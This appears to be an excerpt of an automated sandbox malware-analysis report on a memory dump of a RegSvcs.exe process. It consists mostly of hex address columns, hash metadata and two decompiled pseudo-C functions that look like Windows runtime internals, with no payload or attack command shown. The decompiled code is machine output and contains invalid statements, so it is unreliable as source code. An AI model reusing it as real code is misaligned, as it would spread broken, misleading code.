                                          0x0130db3e
                                          0x0130db46
                                          0x0130db47
                                          0x0130db49
                                          0x0130db4c
                                          0x0130db53
                                          0x0130db55
                                          0x0130db58
                                          0x0130db5a
                                          0x0135b50a
                                          0x0135b50f
                                          0x0135b512
                                          0x0130db60
                                          0x0130db60
                                          0x0130db63
                                          0x0130db63
                                          0x00000000
                                          0x0130db63
                                          0x0130db5a
                                          0x0130db3b
                                          0x0130db24
                                          0x0130db69
                                          0x0130db69
                                          0x0130db6c
                                          0x0130db6f
                                          0x0130db74
                                          0x0135b557
                                          0x0135b557
                                          0x0135b55e
                                          0x0130db7a
                                          0x0130db7c
                                          0x0130db7f
                                          0x0130db82
                                          0x0130db85
                                          0x00000000
                                          0x0130db8b
                                          0x0130db8b
                                          0x0130db8d
                                          0x0130db9b
                                          0x0130db9b
                                          0x0130db9d
                                          0x0130dba0
                                          0x0130dba2
                                          0x0130dba4
                                          0x0130dba7
                                          0x0130dba9
                                          0x0130dbae
                                          0x0130dbae
                                          0x0130dbb1
                                          0x0130dbb4
                                          0x0130dbb4
                                          0x0130dbb7
                                          0x0130dbba
                                          0x0130dcd2
                                          0x0130dcd4
                                          0x00000000
                                          0x0130dbc0
                                          0x0130dbc0
                                          0x0130dbd2
                                          0x0130dbd7
                                          0x0130dbda
                                          0x0130dbdd
                                          0x0130dbdf
                                          0x00000000
                                          0x0130dbe5
                                          0x0130dbe5
                                          0x0130dbee
                                          0x0130dbf1
                                          0x0135b541
                                          0x0135b544
                                          0x00000000
                                          0x0135b546
                                          0x0135b546
                                          0x00000000
                                          0x0135b546
                                          0x0130dbf7
                                          0x0130dbf7
                                          0x0130dbfd
                                          0x0130dbfd
                                          0x0130dbff
                                          0x0130dc0b
                                          0x0130dc15
                                          0x0130dc1b
                                          0x0130dc1d
                                          0x0130dc21
                                          0x0130dc21
                                          0x0130dc23
                                          0x0130dc23
                                          0x0130dc26
                                          0x0130dc29
                                          0x0130dc2b
                                          0x00000000
                                          0x00000000
                                          0x0130dc31
                                          0x0130dc34
                                          0x0130dc36
                                          0x0130dcbf
                                          0x0130dcbf
                                          0x0130dcc2
                                          0x00000000
                                          0x0130dc3c
                                          0x0130dc41
                                          0x0130dc43
                                          0x00000000
                                          0x0130dc45
                                          0x0130dc45
                                          0x0130dc47
                                          0x00000000
                                          0x0130dc4d
                                          0x0130dc4d
                                          0x0130dc50
                                          0x0130dc52
                                          0x0130dc55
                                          0x0130dcfa
                                          0x0130dcfe
                                          0x0130dd08
                                          0x0130dd0a
                                          0x0130dd0c
                                          0x00000000
                                          0x0130dd12
                                          0x0130dd15
                                          0x0130dd2d
                                          0x0130dd2f
                                          0x0130dd32
                                          0x0130dd35
                                          0x00000000
                                          0x0130dd35
                                          0x0130dc5b
                                          0x0130dc5b
                                          0x0130dc5e
                                          0x0130dc61
                                          0x0130dc64
                                          0x0130dc67
                                          0x0130dc67
                                          0x0130dc6a
                                          0x0130dc6c
                                          0x0130dc8e
                                          0x0130dc8e
                                          0x0130dc91
                                          0x0130dc93
                                          0x0130dcce
                                          0x0130dcce
                                          0x0130dc95
                                          0x0130dc9c
                                          0x0130dc6e
                                          0x0130dc72
                                          0x0130dc75
                                          0x0130dc77
                                          0x0130dc79
                                          0x0135b551
                                          0x0135b551
                                          0x00000000
                                          0x0130dc7f
                                          0x0130dc7f
                                          0x0130dc81
                                          0x00000000
                                          0x0130dc83
                                          0x0130dc86
                                          0x0130dc88
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0130dc88
                                          0x0130dc81
                                          0x0130dc79
                                          0x0130dc6c
                                          0x0130dc55
                                          0x0130dc47
                                          0x0130dc43
                                          0x00000000
                                          0x0130dc36
                                          0x0130dc23
                                          0x00000000
                                          0x0130dbff
                                          0x0130dbf1
                                          0x0130dbdf
                                          0x0130db8f
                                          0x0130db92
                                          0x0130db95
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0130db95
                                          0x0130db8d
                                          0x0130db85
                                          0x0130db74
                                          0x0130dc9f
                                          0x0130dca2
                                          0x0130dcb0
                                          0x0130dcb0
                                          0x0130dad1
                                          0x0135b4e5
                                          0x0135b4c8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0130d831
                                          0x0130d80d
                                          0x00000000
                                          0x0130d800
                                          0x0135b47f
                                          0x0135b485
                                          0x00000000
                                          0x0135b485
                                          0x0130d665
                                          0x0130d652
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: b481ffd16974a71f3252787b8c18d52ee29ca43daaf8b796a90e9b56a9f08ab2
                                          • Instruction ID: 934b75ef296eaa56b9528aa99827619ecad0400e910b3eab9e06afcc66eca7f5
                                          • Opcode Fuzzy Hash: b481ffd16974a71f3252787b8c18d52ee29ca43daaf8b796a90e9b56a9f08ab2
                                          • Instruction Fuzzy Hash: 8FE1BE70A0035ACFEB368F9CC860B69BBF6BF8571CF040199D909AB6D5D730A981CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0132513A Relevance: 1.8, APIs: 1, Instructions: 258timeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E0132513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x13ed360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0133D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01312280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01314620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0133F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0130FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x13eb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0133B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                          0x01325142
                                          0x0132514c
                                          0x01325150
                                          0x01325157
                                          0x01325159
                                          0x0132515e
                                          0x01325165
                                          0x01325169
                                          0x0132516c
                                          0x01325172
                                          0x01325176
                                          0x0132517a
                                          0x0132517a
                                          0x0132517a
                                          0x0132517f
                                          0x01366d8b
                                          0x01366d8e
                                          0x01366d91
                                          0x01366d95
                                          0x01366d98
                                          0x01366d9c
                                          0x01366da0
                                          0x01366da3
                                          0x01366da7
                                          0x01366e26
                                          0x01366e26
                                          0x01366e2a
                                          0x013251f9
                                          0x013251f9
                                          0x013251fe
                                          0x01366e33
                                          0x01366e33
                                          0x01366e39
                                          0x01366e3d
                                          0x01366e46
                                          0x01366e50
                                          0x00000000
                                          0x00000000
                                          0x01366e52
                                          0x01366e53
                                          0x01366e56
                                          0x01366e5d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01366e5f
                                          0x01366e67
                                          0x01366e77
                                          0x01366e7f
                                          0x01366e80
                                          0x01366e88
                                          0x01366e90
                                          0x01366e9f
                                          0x01366ea5
                                          0x01366ea9
                                          0x01366eb1
                                          0x01366ebf
                                          0x00000000
                                          0x00000000
                                          0x01366ecf
                                          0x01366ed3
                                          0x00000000
                                          0x00000000
                                          0x01366edb
                                          0x01366ede
                                          0x01366ee1
                                          0x01366ee8
                                          0x01366eeb
                                          0x01366eed
                                          0x01366ef0
                                          0x01366ef4
                                          0x01366ef8
                                          0x01366efc
                                          0x00000000
                                          0x00000000
                                          0x01366f0d
                                          0x01366f11
                                          0x01366f32
                                          0x01366f37
                                          0x01366f3b
                                          0x01366f3e
                                          0x01366f41
                                          0x01366f46
                                          0x00000000
                                          0x00000000
                                          0x01366f4c
                                          0x01366f50
                                          0x01366f50
                                          0x01366f54
                                          0x01366f62
                                          0x01366f65
                                          0x01366f6d
                                          0x01366f7b
                                          0x01366f7b
                                          0x01366f93
                                          0x01366f98
                                          0x01366fa0
                                          0x01366fa6
                                          0x01366fb3
                                          0x01366fb6
                                          0x01366fbf
                                          0x01366fc1
                                          0x01366fd5
                                          0x01366fda
                                          0x01366fda
                                          0x01366fdd
                                          0x01366fe2
                                          0x01366fe7
                                          0x01366feb
                                          0x01366fef
                                          0x01366ff3
                                          0x0132520c
                                          0x0132520c
                                          0x0132520f
                                          0x01325215
                                          0x01325234
                                          0x0132523a
                                          0x0132523a
                                          0x01325244
                                          0x01325245
                                          0x01325246
                                          0x01325251
                                          0x01325251
                                          0x01366f13
                                          0x01366f17
                                          0x01366f17
                                          0x01366f18
                                          0x01366f1b
                                          0x01366f1f
                                          0x01366f23
                                          0x00000000
                                          0x01366f28
                                          0x01325204
                                          0x01325204
                                          0x01325208
                                          0x00000000
                                          0x01325208
                                          0x01325185
                                          0x01325188
                                          0x0132518a
                                          0x0132518e
                                          0x01325195
                                          0x01366db1
                                          0x01366db5
                                          0x01366db9
                                          0x0132519b
                                          0x0132519b
                                          0x0132519e
                                          0x013251a7
                                          0x013251a9
                                          0x013251a9
                                          0x013251b5
                                          0x013251b8
                                          0x013251bb
                                          0x013251be
                                          0x013251c1
                                          0x013251c5
                                          0x013251c9
                                          0x013251cd
                                          0x013251cd
                                          0x013251d8
                                          0x013251dc
                                          0x013251e0
                                          0x01366dcc
                                          0x01366dd0
                                          0x01366dd5
                                          0x01366ddd
                                          0x01366de1
                                          0x01366de1
                                          0x01366de5
                                          0x01366deb
                                          0x01366df1
                                          0x01366df7
                                          0x01366dfd
                                          0x01366e01
                                          0x01366e05
                                          0x01366e09
                                          0x01366e0d
                                          0x01366e11
                                          0x01366e11
                                          0x013251eb
                                          0x01366e1a
                                          0x01366e1f
                                          0x01366e21
                                          0x01366e23
                                          0x00000000
                                          0x013251f1
                                          0x013251f1
                                          0x00000000
                                          0x013251f1

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: b101ed75b23029da9d2c6fa31e687b585f3626cf73725b917c36276baed80b69
                                          • Instruction ID: e6400d15975d5e287692768f50b0dad153929c9a33812f2b9cea50d67e03d5f2
                                          • Opcode Fuzzy Hash: b101ed75b23029da9d2c6fa31e687b585f3626cf73725b917c36276baed80b69
                                          • Instruction Fuzzy Hash: E4C134B55083818FD354CF28C580A5AFBF5BF88308F14896EF9998B392D771E945CB42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013203E2 Relevance: 1.8, APIs: 1, Instructions: 254COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E013203E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x13ed360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01320548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0133B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0130B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x13e7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E01317D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E01317D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01377016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E01339830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E013769A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x13e7c04 != 0) {
						_t118 = _v12;
						_t120 = E0137A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x13e7bd8;
						if( *0x13e7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E013395D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E013399A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01373540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E012FB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0133AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x13e8474 - 3;
										if( *0x13e8474 != 3) {
											 *0x13e79dc =  *0x13e79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E01317D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E01317D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01377016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x13e8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x13e7b00; // 0x0
							asm("ror esi, cl");
							 *0x13eb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E013395D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E01307F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                          0x013203f1
                                          0x013203f7
                                          0x013203f9
                                          0x013203fb
                                          0x013203fd
                                          0x01320400
                                          0x0132040a
                                          0x01364c7a
                                          0x01320537
                                          0x01320547
                                          0x01320410
                                          0x01320410
                                          0x01320414
                                          0x01320417
                                          0x0132041a
                                          0x01320421
                                          0x01320424
                                          0x0132042b
                                          0x0132043b
                                          0x0132043e
                                          0x0132043f
                                          0x0132043f
                                          0x01320446
                                          0x01320449
                                          0x0132044c
                                          0x0132044f
                                          0x01320459
                                          0x01364c8d
                                          0x0132045f
                                          0x0132045f
                                          0x0132045f
                                          0x01320467
                                          0x01364c97
                                          0x01364c9d
                                          0x01364ca4
                                          0x01364caa
                                          0x01364caf
                                          0x01364cb1
                                          0x01364cc3
                                          0x01364cb3
                                          0x01364cbc
                                          0x01364cbc
                                          0x01364cc8
                                          0x01364ccb
                                          0x01364cd7
                                          0x01364cda
                                          0x01364cdf
                                          0x01364cdf
                                          0x01364ccb
                                          0x01364ca4
                                          0x0132046d
                                          0x0132046f
                                          0x0132046f
                                          0x01320471
                                          0x01320476
                                          0x0132047a
                                          0x0132047b
                                          0x01320483
                                          0x01320489
                                          0x0132048d
                                          0x00000000
                                          0x00000000
                                          0x01364ce9
                                          0x01364cef
                                          0x01364d22
                                          0x01364d22
                                          0x00000000
                                          0x01364d22
                                          0x01364cf1
                                          0x01364cf7
                                          0x00000000
                                          0x00000000
                                          0x01364cf9
                                          0x01364cff
                                          0x00000000
                                          0x00000000
                                          0x01364d05
                                          0x01364d07
                                          0x00000000
                                          0x00000000
                                          0x01364d0d
                                          0x01364d0f
                                          0x01364d14
                                          0x01364d16
                                          0x00000000
                                          0x00000000
                                          0x01364d1c
                                          0x01364d1c
                                          0x01320499
                                          0x01320535
                                          0x01320535
                                          0x00000000
                                          0x01320535
                                          0x013204a6
                                          0x01364d2c
                                          0x01364d37
                                          0x01364d39
                                          0x01364d3b
                                          0x00000000
                                          0x00000000
                                          0x01364d41
                                          0x01364d48
                                          0x01320527
                                          0x0132052b
                                          0x0132052d
                                          0x01320530
                                          0x01320530
                                          0x00000000
                                          0x0132052b
                                          0x01364d4e
                                          0x013204ac
                                          0x013204ac
                                          0x013204af
                                          0x013204b2
                                          0x013204b7
                                          0x013204b9
                                          0x013204bb
                                          0x013204bd
                                          0x013204bf
                                          0x013204c5
                                          0x013204c9
                                          0x01364d53
                                          0x01364d59
                                          0x01364db9
                                          0x01364dba
                                          0x01364dbf
                                          0x01364dc2
                                          0x01364dc4
                                          0x01364dc7
                                          0x01364dce
                                          0x00000000
                                          0x01364dce
                                          0x01364d5b
                                          0x01364d61
                                          0x00000000
                                          0x00000000
                                          0x01364d63
                                          0x01364d69
                                          0x00000000
                                          0x00000000
                                          0x01364d6b
                                          0x01364d6e
                                          0x01364d74
                                          0x01364d76
                                          0x01364d7c
                                          0x01364d7e
                                          0x01364d84
                                          0x01364d89
                                          0x01364d8c
                                          0x01364d8d
                                          0x01364d92
                                          0x01364d95
                                          0x01364d96
                                          0x01364d98
                                          0x01364d9a
                                          0x01364d9f
                                          0x01364da4
                                          0x01364da6
                                          0x01364da8
                                          0x01364daf
                                          0x01364db1
                                          0x01364db1
                                          0x01364daf
                                          0x01364da6
                                          0x01364d84
                                          0x01364d7c
                                          0x00000000
                                          0x01364d74
                                          0x013204d6
                                          0x01364de1
                                          0x013204dc
                                          0x013204dc
                                          0x013204dc
                                          0x013204e4
                                          0x01364deb
                                          0x01364df1
                                          0x01364df8
                                          0x01364dfe
                                          0x01364e03
                                          0x01364e05
                                          0x01364e17
                                          0x01364e07
                                          0x01364e10
                                          0x01364e10
                                          0x01364e1c
                                          0x01364e1f
                                          0x01364e35
                                          0x01364e35
                                          0x01364e1f
                                          0x01364df8
                                          0x013204f1
                                          0x013204fa
                                          0x01364e3f
                                          0x01364e47
                                          0x01364e5b
                                          0x01364e61
                                          0x01364e67
                                          0x01364e69
                                          0x01364e71
                                          0x01364e73
                                          0x01320500
                                          0x01320500
                                          0x01320500
                                          0x013204fa
                                          0x01320508
                                          0x0132051d
                                          0x0132051d
                                          0x0132051f
                                          0x01320524
                                          0x00000000
                                          0x01320524
                                          0x01320515
                                          0x01320517
                                          0x01364e7a
                                          0x01364e7c
                                          0x00000000
                                          0x00000000
                                          0x01364e85
                                          0x00000000
                                          0x01364e85
                                          0x00000000
                                          0x01320517

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fa544677a0e973ea3aea205d3bd2bb161457be27de92eb3853d12d7b7bc57066
                                          • Instruction ID: 9f819feee5b02a29355ac2bb07590dd64fa4f07c8f6b18491bfb8dc75bdfe486
                                          • Opcode Fuzzy Hash: fa544677a0e973ea3aea205d3bd2bb161457be27de92eb3853d12d7b7bc57066
